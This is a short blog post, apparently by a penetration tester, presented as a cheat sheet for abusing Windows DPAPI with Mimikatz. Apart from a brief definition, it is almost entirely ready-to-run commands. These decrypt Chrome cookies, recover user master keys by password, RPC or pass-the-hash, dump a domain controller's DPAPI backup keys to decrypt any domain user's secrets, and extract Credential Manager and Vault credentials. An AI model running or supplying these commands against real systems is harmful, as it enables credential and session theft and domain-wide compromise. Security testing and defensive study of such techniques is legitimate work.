Abusing DPAPI using Mimikatz

What is DPAPI ? 

According to wiki, DPAPI (Data Protection Application Programming Interface) is a simple cryptographic application programming interface available as a built-in component in Windows 2000 and later versions of Microsoft Windows operating systems. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

Abusing DPAPI 

#Decrypting Chrome Data when you have code execution on target
dpapi::chrome/in:"localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect

#Decrypting chrome data when the user is logged in and we have admin access 
#Get user's master key using mimikatz
#Show the decrypted content of  cookies 
dpapi::chrome/in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies" /masterkey:t87fd5fdsftdsf5tds9f8dstf96ds5ds965f67sdftr67dssdf6ds87bf6ds8

#Decrypting chrome data when the user is NOT logged in and we have admin access using mimikatz
#NTLM/Plain text password of the user is required
dpapi::masterkey /in:<MASTERKEY_LOCATION> /sid:<USER_SID> /password:<PASSWORD> /protected

#Decrypt the masterkey when we know the user password
dpapi::masterkey /in:"User_KEy" /sid:<USER_SID> /password:<PASSWORD> /protected

#Decrypt masterkey using default creds via shell 
dpapi::masterkey /in:<MASTERKEY_LOCATION> /rpc
dpapi::masterkey /in:"C:\Users\bhanu\AppData\Roaming\Microsoft\Protect\S-1-5-21-803410069-3844050295-3216536831-1001\dg54tg-54g52-sad232r" /rpc
#now you can decrypt the credentials from cred manager
dpapi::creds /in:"C:\Users\bhanu\AppData\Local\Microsoft\Credentials\<CRED>" /masterkey:<MASTERKEY> /unprotect

#Incase we only know the user's hash
sekurlsa::pth /user:User_Name /domain:Steins.local /ntlm:98d6sa987dytsa7d9gsa987dagd
dpapi::masterkey /in:"C:\Users\bhanu\AppData\Roaming\Microsoft\Protect\S-1-5-21-803410069-3844050295-3216536831-1001\adssad32q-waE32q432-ae3q432-Ae3q432" /rpc
dpapi::masterkey /in:"<Master_key>"
#Decrypt chrome data 
dpapi::chrome /in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies"

#When you have access to Domain Controller 
# domain user master keys are also protected  with a domain wide backup DPAPI key, this can be extracted for decrypting any domain user masterkey. 
# Dump the backup keys
lsadump::backupkeys /system:<DOMAIN_CONTROLLEr> /export
#use these keys to decrypt the data on any target machine from the same domain.
dpapi::masterkey /in:”<USER_MASTERKEY>” /pvk:<DOMAIN_BACKUP_KEY>
dpapi::chrome /in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies"

#Decrypting Valut keys using mimikatz
#valut creds and AES keys used to encrypt the creds are stored under C:\Users\bhanu\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28;
#for plaintext creds
valut::cred /patch


Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment